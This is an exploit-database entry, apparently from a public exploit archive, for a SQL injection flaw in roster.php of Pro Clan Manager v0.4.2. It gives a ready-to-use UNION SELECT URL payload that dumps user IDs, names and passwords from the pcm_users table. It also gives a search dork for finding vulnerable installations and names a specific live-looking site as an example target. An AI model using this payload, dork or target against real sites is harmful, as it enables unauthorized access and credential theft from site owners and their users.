id: 18470
date: 06/07/2012
title: Pro Clan Manager v0.4.2 (roster.php) Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

Pro Clan Manager v0.4.2 (roster.php) Sql Injection Vulnerability
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://sourceforge.net/projects/autoweb/
.:. Dork           : "powered by Pro Clan Manager"
#######################################################################

===[ Exploit ]===


Sql Injection
==============

http://SITE/roster.php?id=null[sql]

http://SiTEroster.php?id=null+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat(u_id,0x3a,u_name,0x3a,u_password)+from+pcm_users

Example:

http://members.multimania.co.uk/jokerbba/roster.php?id=1


#######################################################################



#  0day.today [2023-03-26]  #